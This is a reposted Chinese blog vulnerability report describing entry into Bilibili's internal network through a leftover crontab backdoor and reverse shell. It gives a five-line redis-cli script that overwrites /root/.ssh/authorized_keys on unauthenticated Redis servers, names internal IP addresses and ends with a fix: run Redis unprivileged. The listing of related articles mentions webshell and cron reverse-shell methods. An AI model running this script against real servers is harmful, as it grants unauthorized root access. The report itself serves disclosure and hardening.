默认 redis 安装存在漏洞, 可以直接 获取 root 权限

最新推荐文章于 2024-05-17 14:20:14 发布
最新推荐文章于 2024-05-17 14:20:14 发布
阅读量4.8k 收藏
点赞数 2
分类专栏: 网站安全-攻击

转载地址:http://www.2cto.com/Article/201512/454117.html


我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。嗯,假装是不知道哪年哪月的一个 crontab 后门再次把我带入了 Bilibili 的内网。
内网存在许多 redis 未授权访问,为什么不问问神奇海螺呢?

详细说明:

我假装闲来无事地在 VPS 上监听了某一个端口,然后突然反弹过来一个 shell。

1.png

估计是之前留的 crontab 后门,不过这不重要。

前几天爆出了 redis 未授权访问然后写 authorized_keys 来强行拿权限,总之原理是如此如此,可以看
 http://www.2cto.com/Article/201512/454361.html 来了解具体利用。

在 B 站内网扫描了一下 6379 端口,然后写了一个 sh 脚本来自动化执行。
 

code 区域
?
1
2
3
4
5
<code>redis-cli  -h $ 1 flushall
     cat foo.txt | redis-cli -h $ 1 -x set 1
     redis-cli -h $ 1 config set dir /root/.ssh
     redis-cli -h $ 1 config set dbfilename authorized_keys
     redis-cli -h $ 1 save</code>

2.png

然后“姆Q”的一下子,成功了一个。

3.png

Bilibili (゜-゜)つロ 乾杯~

由于 redis 是用 root 权限启动的,所以直接能在 /root/.ssh/ 下面写文件。

5.png

4.png

漏洞证明:

3.png

5.png

4.png

如图所示

修复方案:

用 nobody 权限来启动 redis。,

另外测试的 172.16.0.208、172.16.0.203 的 authorized_keys 已恢复,crontab 后门已清理。


TerryWater
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redis写定时任务获取root权限
11-18 375
前提: 1.redisroot用户启动。 2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。 启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列...
使用redis就可以获得root权限,怎么做的?
AnNanDu的博客
10-10 1727
我在云服务上安过两次redis,每次都被提示攻击他人。(我是好人怎么可能会干坏事呢) 所以我的服务器肯定被人入侵了,因为是个人服务器没什么重要东西端口是常年开放的也没有开启白名单防火墙,最重要的是密码都不设。怪不得天天被入侵,下面进行一下复现。
Redis- 如何防止攻击者利用未授权访问 Redis 服务的攻击获取目标机器的 root 权限
青衫客36的博客
05-15 407
以下攻击步骤展示了如何利用未加防护的 Redis 服务器,通过配置 Redis 的持久化机制,将攻击者的 SSH 公钥写入目标机器的文件,从而获取目标机器的 root 权限。这是一种典型的利用未授权访问 Redis 服务的攻击方法。cd ~/.ssh/进入攻击者的~/.ssh目录。使用命令将 SSH 公钥文件id_rsa.pub的内容包裹在前后两个空行中,并重定向输出到key.txt文件。加入前后两个空行是关键,因为这样可以确保文件的格式正确,不会破坏已有的条目。
redis安装及配置【root
yangchuang11的博客
09-15 147
Redis集群不仅需要开通redis客户端连接的端口,而且需要开通集群总线端口,集群总线端口为redis客户端连接的端口 + 10000,如redis端口为7000,则集群总线端口为17000,因此所有服务器的点需要开通redis的客户端连接端口和集群总线端口。etstat -tnlp | grep redis//查看redis端口开启情况。–replicas 1 希望为集群中的每个主节点创建一个从节点。个人理解:主从集群去掉从节点或者直接启动所有redis节点(全是主节点)
Centos Docker部署教程_docker部署centos
2401_84281655的博客
04-28 335
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
Redis的启动方式三种
热门推荐
qq_27970307的博客
08-03 7万+
Redis的启动方式三种 启动一个 ,进入到redis中的src目录下 在控制台输入指令:redis-server (注意:这样启动默认端口是 6379 ) 进入客户端输入:redis-cli 查看进程,杀死进程 指定端口启动redis服务 redis-server --port 8888 进入客户端:redis-cli -p 8888 配置文件启动(注意:这里一定要注意 必须是root 用户操作) redis中的配置文件是 redis.conf 我们先看看如何使用配置文件启动: 启动
Windows 上安装 Redis安装redis7.2安装到windows上面
08-29
在Windows上安装Redis的过程涉及到多个步骤,包括启用必要的Windows功能、安装WSL2(Windows Subsystem for Linux 2)、设置默认WSL版本以及在Linux环境中安装Redis。以下是对这些步骤的详细说明: 1. **启用...
redis-64.3.0.503 64位redis安装文件,直接运行批处理安装
04-04
本资源为Redis的64位版本,版本号为3.0.503,针对Windows操作系统设计,提供了便捷的批处理安装和卸载功能。 首先,Redis的核心特性包括: 1. **高速度**:Redis基于内存存储,读写速度极快,是NoSQL数据库中的佼佼...
Redis安装与卸载文档
08-21
为了安装 Redis,我们可以通过在官网下载 tar.gz 的安装包,或者通过 wget 的方式下载。下面是一个使用 wget 下载 Redis 的示例命令: [root@localhost data]# wget ...
windows redis 安装 redis 安装 redis 安装
11-13
你可以找到安装目录下的 `redis.windows-service.conf` 文件进行配置。主要配置项有: - `port`:Redis 服务器监听的端口,默认是 6379。 - `bind`:指定 Redis 服务监听的 IP 地址,如果不配置或设置为 0.0.0.0,...
Centos下通过一键安装Redis脚本,安装过程中可以直接自定义端口、密码
07-18
Centos下一键安装Redis脚本 1. 上传文件到Centos下,解压并进入目录,赋予脚本执行权限 ``` shell chmod +x installRedis-singleV2.1 ``` 2. 执行脚本进行安装 `./installRedis-singleV2.1` 3. 完成安装
redis如果不是root用户,不能建立软链接,怎么启动成功呢?
相信守月亮的博客
06-26 964
可以通过配置环境变量实现 vim .bash_profile export PATH=/home/redis-2.6.13/src:$PATH
linux配置ssh公钥认证,打通root用户的免密码输入的scp通道
donggou7958的博客
09-27 265
1.ssh-keygen ssh-keygen是unix-like系统的一个用来生成、管理ssh公钥和私钥的工具。 2.用法 常用的重要的选项有: -b num 指定生成多少比特长度的key,单位为b,默认为1024b -t 指定生成key的类型,也就是使用哪一种加密算法,可选的有rsa1 |rsa |dsa 3. [root@iD...
redis未授权访问漏洞(三种方法)
网安小白的博客
08-30 5374
redis未授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
使用Linux下普通用户部署安装Redis
最新发布
Monks_gao的博客
05-17 459
在现代企业当中,root用户权限一般不会随意给项目组使用,会有专人管理root权限,所以在部署前需要考虑到后面的redis数据库的使用用户是非root连接的,这里介绍一下前期使用root用户部署redis,进程归属为普通用户,这样一来,后期可以在不使用操作系统的超管用户下管理并使用redis数据库。
redis安装教程(简明扼要,一看就懂)
qq_44104879的博客
08-19 1万+
简明扼要,一看就懂--- redis 安装教程
redis利用总结
qq_56426046的博客
09-28 1146
kali安装redis-clikali监听9999端口远程访问不了把protected-mode改成no另一种代码形式。
Redis未授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9407
redis未授权访问漏洞
redis 普通用户,非root用户安装redis
panjinxiang4217的专栏
07-01 3017
1、下载地址 redis下载地址: 可以在如下的地址下载到你想要的所有版本,我们这里使用的是5.0.12 https://download.redis.io/releases/ 2、新建redis普通用户 1)、使用root登录我们的系统 2)、新建组:groupadd redis 3)、新建用户:useradd redis-g redis 4)、设置密码:passwd redis 自己输入密码即可 groupadd redis useradd redis -g red..
redis root权限
08-31
Redis 不需要 root 权限来运行。通常情况下,Redis 是以普通用户的身份运行的,而不是 root 用户。这是为了提高安全性,以防止 Redis 服务器被未经授权的用户滥用。 当你安装 Redis 时,它会创建一个 Redis 用户并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值